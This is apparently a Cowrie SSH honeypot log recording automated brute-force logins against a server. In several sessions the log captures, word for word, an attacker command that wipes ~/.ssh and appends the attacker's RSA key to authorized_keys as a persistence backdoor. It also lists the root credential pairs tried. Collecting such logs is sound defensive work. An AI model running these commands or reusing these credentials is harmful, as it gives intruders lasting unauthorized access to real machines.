{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.682003Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.800179Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.801050Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.session.connect","src_ip":"23.95.128.167","src_port":37486,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f030c8f9bc7","protocol":"ssh","message":"New connection: 23.95.128.167:37486 (1.2.3.4:22) [session: 3f030c8f9bc7]","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.917028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:18:23.917708Z","src_ip":"23.95.128.167","session":"3f030c8f9bc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:18:24.034329Z","src_ip":"23.95.128.167","session":"3f030c8f9bc7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:18:24.538746Z","src_ip":"23.95.128.167","session":"3f030c8f9bc7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:25.656545Z","src_ip":"23.95.128.167","session":"3f030c8f9bc7"}
{"eventid":"cowrie.session.connect","src_ip":"23.95.128.167","src_port":59170,"dst_ip":"1.2.3.4","dst_port":22,"session":"101f48af76b7","protocol":"ssh","message":"New connection: 23.95.128.167:59170 (1.2.3.4:22) [session: 101f48af76b7]","sensor":"my-vps","timestamp":"2025-08-26T08:18:25.771928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:18:25.772949Z","src_ip":"23.95.128.167","session":"101f48af76b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:18:25.889410Z","src_ip":"23.95.128.167","session":"101f48af76b7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:18:26.764985Z","src_ip":"23.95.128.167","session":"101f48af76b7"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:26.883402Z","src_ip":"23.95.128.167","session":"130d0d0d7c2c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:26.884474Z","src_ip":"23.95.128.167","session":"101f48af76b7"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.24.220","src_port":51892,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1567dc28563","protocol":"ssh","message":"New connection: 139.59.24.220:51892 (1.2.3.4:22) [session: b1567dc28563]","sensor":"my-vps","timestamp":"2025-08-26T08:18:39.138931Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:18:39.139712Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:18:39.401004Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.login.success","username":"root","password":"drcomadmin123","message":"login attempt [root/drcomadmin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:18:40.487221Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:18:41.029806Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:18:41.030475Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:18:41.031302Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:41.293715Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:18:41.921852Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:18:41.922498Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:18:42.186715Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:42.187696Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.24.220","src_port":51902,"dst_ip":"1.2.3.4","dst_port":22,"session":"770033219568","protocol":"ssh","message":"New connection: 139.59.24.220:51902 (1.2.3.4:22) [session: 770033219568]","sensor":"my-vps","timestamp":"2025-08-26T08:18:42.436689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:18:42.437947Z","src_ip":"139.59.24.220","session":"770033219568"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:18:42.714334Z","src_ip":"139.59.24.220","session":"770033219568"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T08:18:43.818905Z","src_ip":"139.59.24.220","session":"770033219568"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:45.078059Z","src_ip":"139.59.24.220","session":"770033219568"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.24.220","src_port":58064,"dst_ip":"1.2.3.4","dst_port":22,"session":"748ae4875f40","protocol":"ssh","message":"New connection: 139.59.24.220:58064 (1.2.3.4:22) [session: 748ae4875f40]","sensor":"my-vps","timestamp":"2025-08-26T08:18:45.341607Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:18:45.342484Z","src_ip":"139.59.24.220","session":"748ae4875f40"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:18:45.618391Z","src_ip":"139.59.24.220","session":"748ae4875f40"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:18:46.738602Z","src_ip":"139.59.24.220","session":"748ae4875f40"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:47.004883Z","src_ip":"139.59.24.220","session":"748ae4875f40"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:18:47.008881Z","src_ip":"139.59.24.220","session":"b1567dc28563"}
{"eventid":"cowrie.session.connect","src_ip":"36.255.220.204","src_port":56898,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c5e0c5206dc","protocol":"ssh","message":"New connection: 36.255.220.204:56898 (1.2.3.4:22) [session: 1c5e0c5206dc]","sensor":"my-vps","timestamp":"2025-08-26T08:19:10.348730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:19:10.351563Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T08:19:10.615085Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.login.success","username":"root","password":"server10","message":"login attempt [root/server10] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:19:11.646916Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:19:12.230825Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:19:12.231358Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T08:19:12.232836Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:12.493645Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:19:13.040468Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T08:19:13.041191Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T08:19:13.301911Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:19:13.302889Z","src_ip":"36.255.220.204","session":"1c5e0c5206dc"}
{"eventid":"cowrie.session.connect","src_ip":"36.255.220.204","src_port":57736,"dst_ip":"1.2.3.4","dst_port":22,"session":"abac5b47f110","protocol":"ssh","message":"New connection: 36.255.220.204:57736 (1.2.3.4:22) [session: abac5b47f110]","sensor":"my-vps","timestamp":"2025-08-26T08:19:13.552670Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:19:13.562768Z","src_ip":"36.255.220.204","session":"abac5b47f110"}
